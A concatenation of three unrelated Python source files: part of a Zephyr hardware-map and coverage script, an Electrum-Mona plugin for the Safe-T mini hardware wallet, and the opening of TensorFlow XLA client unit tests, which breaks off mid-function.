os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform):
device = {
"serial": serial,
"platform": platform,
"counter": 0,
"available": True,
"connected": True
}
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=yaml.FullLoader)
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product']:
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_mona.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_mona.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_mona.bip32 import BIP32Node
from electrum_mona import constants
from electrum_mona.i18n import _
from electrum_mona.plugin import Device
from electrum_mona.transaction import deserialize, Transaction
from electrum_mona.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_mona.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Monacoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla import xla_data_pb2
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
import unittest
class EnumTest(unittest.TestCase):
"""Verifies Python enumerations match their protocol buffer equivalents."""
def testPrimitiveType(self):
for name, value in xla_client.PrimitiveType.__members__.items():
self.assertEqual(value, getattr(xla_data_pb2, name))
def testFormat(self):
for name, value in xla_client.Format.__members__.items():
self.assertEqual(value, getattr(xla_data_pb2, name))
class ComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.ExecuteWithPythonValues(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None, rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(unittest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
builder.Mul(p0, p1)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
root = c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
